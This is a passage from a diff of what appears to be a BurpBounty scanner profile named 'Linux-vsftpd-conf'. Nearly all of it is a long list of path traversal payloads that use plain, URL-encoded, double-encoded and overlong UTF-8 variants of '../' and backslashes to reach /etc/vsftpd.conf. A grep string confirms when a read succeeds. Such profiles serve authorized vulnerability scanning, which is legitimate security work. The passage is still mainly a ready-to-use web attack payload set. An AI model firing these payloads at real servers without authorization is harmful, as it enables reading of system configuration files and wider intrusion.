ILE}","..\\..\\\\..\\..\\\\..\\..\\\\..\\{FILE}","..\\..\\\\..\\..\\\\..\\..\\\\..\\..\\\\{FILE}","..///{FILE}","../..///{FILE}","../..//..///{FILE}","../..//../..///{FILE}","../..//../..//..///{FILE}","../..//../..//../..///{FILE}","../..//../..//../..//..///{FILE}","../..//../..//../..//../..///{FILE}","..\\\\\\{FILE}","..\\..\\\\\\{FILE}","..\\..\\\\..\\\\\\{FILE}","..\\..\\\\..\\..\\\\\\{FILE}","..\\..\\\\..\\..\\\\..\\\\\\{FILE}","..\\..\\\\..\\..\\\\..\\..\\\\\\{FILE}","..\\..\\\\..\\..\\\\..\\..\\\\..\\\\\\{FILE}","..\\..\\\\..\\..\\\\..\\..\\\\..\\..\\\\\\{FILE}"],"Encoder":[],"UrlEncode":false,"CharsToUrlEncode":"","Grep":["true,Or,Example config file"],"Tags":["All"],"PayloadResponse":false,"NotResponse":false,"TimeOut":"","isTime":false,"contentLength":"","iscontentLength":false,"CaseSensitive":false,"ExcludeHTTP":false,"OnlyHTTP":false,"IsContentType":false,"ContentType":"","NegativeCT":false,"IsResponseCode":false,"ResponseCode":"","NegativeRC":false,"isurlextension":false,"NegativeUrlExtension":false,"MatchType":1,"RedirType":0,"MaxRedir":0,"payloadPosition":1,"payloadsFile":"","grepsFile":"","IssueName":"Linux-vsftpd-conf","IssueSeverity":"Medium","IssueConfidence":"Certain","IssueDetail":"Linux-vsftpd-conf","RemediationDetail":"","IssueBackground":"","RemediationBackground":"","Header":[{"type":"Payload","match":"{FILE}","replace":"etc/vsftpd.conf","regex":"String"}],"VariationAttributes":[],"InsertionPointType":[18,65,32,36,7,1,2,6,33,5,35,34,64,0,3,4,37,127,65,32,36,7,1,2,6,33,5,35,34,64,0,3,4,37,127],"Scantype":0,"pathDiscovery":false}]
\ No newline at end of file
+[
+ {
+ "ProfileName": "Linux-vsftpd-conf",
+ "Name": "",
+ "Enabled": true,
+ "Scanner": 1,
+ "Author": "@Sy3Omda",
+ "Payloads": [
+ "true,../{FILE}",
+ "true,../../{FILE}",
+ "true,../../../{FILE}",
+ "true,../../../../{FILE}",
+ "true,../../../../../{FILE}",
+ "true,../../../../../../{FILE}",
+ "true,../../../../../../../{FILE}",
+ "true,../../../../../../../../{FILE}",
+ "true,..%2f{FILE}",
+ "true,..%2f..%2f{FILE}",
+ "true,..%2f..%2f..%2f{FILE}",
+ "true,..%2f..%2f..%2f..%2f{FILE}",
+ "true,..%2f..%2f..%2f..%2f..%2f{FILE}",
+ "true,..%2f..%2f..%2f..%2f..%2f..%2f{FILE}",
+ "true,..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}",
+ "true,..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}",
+ "true,%2e%2e/{FILE}",
+ "true,%2e%2e/%2e%2e/{FILE}",
+ "true,%2e%2e/%2e%2e/%2e%2e/{FILE}",
+ "true,%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}",
+ "true,%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}",
+ "true,%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}",
+ "true,%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}",
+ "true,%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}",
+ "true,%2e%2e%2f{FILE}",
+ "true,%2e%2e%2f%2e%2e%2f{FILE}",
+ "true,%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}",
+ "true,%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}",
+ "true,%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}",
+ "true,%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}",
+ "true,%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}",
+ "true,%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}",
+ "true,..%252f{FILE}",
+ "true,..%252f..%252f{FILE}",
+ "true,..%252f..%252f..%252f{FILE}",
+ "true,..%252f..%252f..%252f..%252f{FILE}",
+ "true,..%252f..%252f..%252f..%252f..%252f{FILE}",
+ "true,..%252f..%252f..%252f..%252f..%252f..%252f{FILE}",
+ "true,..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}",
+ "true,..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}",
+ "true,%252e%252e/{FILE}",
+ "true,%252e%252e/%252e%252e/{FILE}",
+ "true,%252e%252e/%252e%252e/%252e%252e/{FILE}",
+ "true,%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}",
+ "true,%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}",
+ "true,%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}",
+ "true,%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}",
+ "true,%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}",
+ "true,%252e%252e%252f{FILE}",
+ "true,%252e%252e%252f%252e%252e%252f{FILE}",
+ "true,%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}",
+ "true,%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}",
+ "true,%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}",
+ "true,%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}",
+ "true,%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}",
+ "true,%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}",
+ "true,..\\{FILE}",
+ "true,..\\..\\{FILE}",
+ "true,..\\..\\..\\{FILE}",
+ "true,..\\..\\..\\..\\{FILE}",
+ "true,..\\..\\..\\..\\..\\{FILE}",
+ "true,..\\..\\..\\..\\..\\..\\{FILE}",
+ "true,..\\..\\..\\..\\..\\..\\..\\{FILE}",
+ "true,..\\..\\..\\..\\..\\..\\..\\..\\{FILE}",
+ "true,..%255c{FILE}",
+ "true,..%255c..%255c{FILE}",
+ "true,..%255c..%255c..%255c{FILE}",
+ "true,..%255c..%255c..%255c..%255c{FILE}",
+ "true,..%255c..%255c..%255c..%255c..%255c{FILE}",
+ "true,..%255c..%255c..%255c..%255c..%255c..%255c{FILE}",
+ "true,..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}",
+ "true,..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}",
+ "true,..%5c..%5c{FILE}",
+ "true,..%5c..%5c..%5c{FILE}",
+ "true,..%5c..%5c..%5c..%5c{FILE}",
+ "true,..%5c..%5c..%5c..%5c..%5c{FILE}",
+ "true,..%5c..%5c..%5c..%5c..%5c..%5c{FILE}",
+ "true,..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}",
+ "true,..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}",
+ "true,%2e%2e\\{FILE}",
+ "true,%2e%2e\\%2e%2e\\{FILE}",
+ "true,%2e%2e\\%2e%2e\\%2e%2e\\{FILE}",
+ "true,%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}",
+ "true,%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}",
+ "true,%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}",
+ "true,%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}",
+ "true,%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}",
+ "true,%2e%2e%5c{FILE}",
+ "true,%2e%2e%5c%2e%2e%5c{FILE}",
+ "true,%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}",
+ "true,%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}",
+ "true,%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}",
+ "true,%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}",
+ "true,%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}",
+ "true,%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}",
+ "true,%252e%252e\\{FILE}",
+ "true,%252e%252e\\%252e%252e\\{FILE}",
+ "true,%252e%252e\\%252e%252e\\%252e%252e\\{FILE}",
+ "true,%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}",
+ "true,%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}",
+ "true,%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}",
+ "true,%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}",
+ "true,%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}",
+ "true,%252e%252e%255c{FILE}",
+ "true,%252e%252e%255c%252e%252e%255c{FILE}",
+ "true,%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}",
+ "true,%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}",
+ "true,%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}",
+ "true,%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}",
+ "true,%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}",
+ "true,%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}",
+ "true,..%c0%af{FILE}",
+ "true,..%c0%af..%c0%af{FILE}",
+ "true,..%c0%af..%c0%af..%c0%af{FILE}",
+ "true,..%c0%af..%c0%af..%c0%af..%c0%af{FILE}",
+ "true,..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af{FILE}",
+ "true,..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af{FILE}",
+ "true,..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af{FILE}",
+ "true,..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af{FILE}",
+ "true,%c0%ae%c0%ae/{FILE}",
+ "true,%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}",
+ "true,%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}",
+ "true,%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}",
+ "true,%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}",
+ "true,%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}",
+ "true,%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}",
+ "true,%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}",
+ "true,%c0%ae%c0%ae%c0%af{FILE}",
+ "true,%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}",
+ "true,%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}",
+ "true,%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}",
+ "true,%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}",
+ "true,%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}",
+ "true,%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}",
+ "true,%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}",
+ "true,..%25c0%25af{FILE}",
+ "true,..%25c0%25af..%25c0%25af{FILE}",
+ "true,..%25c0%25af..%25c0%25af..%25c0%25af{FILE}",
+ "true,..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af{FILE}",
+ "true,..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af{FILE}",
+ "true,..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af{FILE}",
+ "true,..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af{FILE}",
+ "true,..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af{FILE}",
+ "true,%25c0%25ae%25c0%25ae/{FILE}",
+ "true,%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}",
+ "true,%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}",
+ "true,%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}",
+ "true,%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}",
+ "true,%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}",
+ "true,%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}",
+ "true,%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}",
+ "true,%25c0%25ae%25c0%25ae%25c0%25af{FILE}",
+ "true,%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}",
+ "true,%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}",
+ "true,%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}",
+ "true,%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}",
+ "true,%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}",
+ "true,%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}",
+ "true,%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}",
+ "true,..%c1%9c{FILE}",
+ "true,..%c1%9c..%c1%9c{FILE}",
+ "true,..%c1%9c..%c1%9c..%c1%9c{FILE}",
+ "true,..%c1%9c..%c1%9c..%c1%9c..%c1%9c{FILE}",
+ "true,..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c{FILE}",
+ "true,..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c{FILE}",
+ "true,..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c{FILE}",
+ "true,..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c{FILE}",
+ "true,%c0%ae%c0%ae\\{FILE}",
+ "true,%c0%ae%c0%ae\\%c0%ae%c0%ae\\{FILE}",
+ "true,%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\{FILE}",
+ "true,%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\{FILE}",
+ "true,%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\{FILE}",
+ "true,%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\{FILE}",
+ "true,%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\{FILE}",
+ "true,%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\{FILE}",
+ "true,%c0%ae%c0%ae%c1%9c{FILE}",
+ "true,%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}",
+ "true,%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}",
+ "true,%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}",
+ "true,%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}",
+ "true,%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}",
+ "true,%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}",
+ "true,%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}",
+ "true,..%25c1%259c{FILE}",
+ "true,..%25c1%259c..%25c1%259c{FILE}",
+ "true,..%25c1%259c..%25c1%259c..%25c1%259c{FILE}",
+ "true,..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c{FILE}",
+ "true,..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c{FILE}",
+ "true,..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c{FILE}",
+ "true,..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c{FILE}",
+ "true,..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c{FILE}",
+ "true,%25c0%25ae%25c0%25ae\\{FILE}",
+ "true,%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\{FILE}",
+ "true,%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\{FILE}",
+ "true,%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\{FILE}",
+ "true,%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\{FILE}",
+ "true,%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\{FILE}",
+ "true,%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\{FILE}",
+ "true,%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\{FILE}",
+ "true,%25c0%25ae%25c0%25ae%25c1%259c{FILE}",
+ "true,%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}",
+ "true,%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}",
+ "true,%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}",
+ "true,%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}",
+ "true,%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}",
+ "true,%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}",
+ "true,%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}",
+ "true,..%%32%66{FILE}",
+ "true,..%%32%66..%%32%66{FILE}",
+ "true,..%%32%66..%%32%66..%%32%66{FILE}",
+ "true,..%%32%66..%%32%66..%%32%66..%%32%66{FILE}",
+ "true,..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66{FILE}",
+ "true,..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66{FILE}",
+ "true,..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66{FILE}",
+ "true,..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66{FILE}",
+ "true,%%32%65%%32%65/{FILE}",
+ "true,%%32%65%%32%65/%%32%65%%32%65/{FILE}",
+ "true,%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}",
+ "true,%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}",
+ "true,%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}",
+ "true,%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}",
+ "true,%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}",
+ "true,%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}",
+ "true,%%32%65%%32%65%%32%66{FILE}",
+ "true,%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}",
+ "true,%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}",
+ "true,%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}",
+ "true,%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}",
+ "true,%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}",
+ "true,%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}",
+ "true,%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}",
+ "true,..%%35%63{FILE}",
+ "true,..%%35%63..%%35%63{FILE}",
+ "true,..%%35%63..%%35%63..%%35%63{FILE}",
+ "true,..%%35%63..%%35%63..%%35%63..%%35%63{FILE}",
+ "true,..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63{FILE}",
+ "true,..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63{FILE}",
+ "true,..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63{FILE}",
+ "true,..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63{FILE}",
+ "true,%%32%65%%32%65/{FILE}",
+ "true,%%32%65%%32%65/%%32%65%%32%65/{FILE}",
+ "true,%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}",
+ "true,%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}",
+ "true,%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}",
+ "true,%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}",
+ "true,%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}",
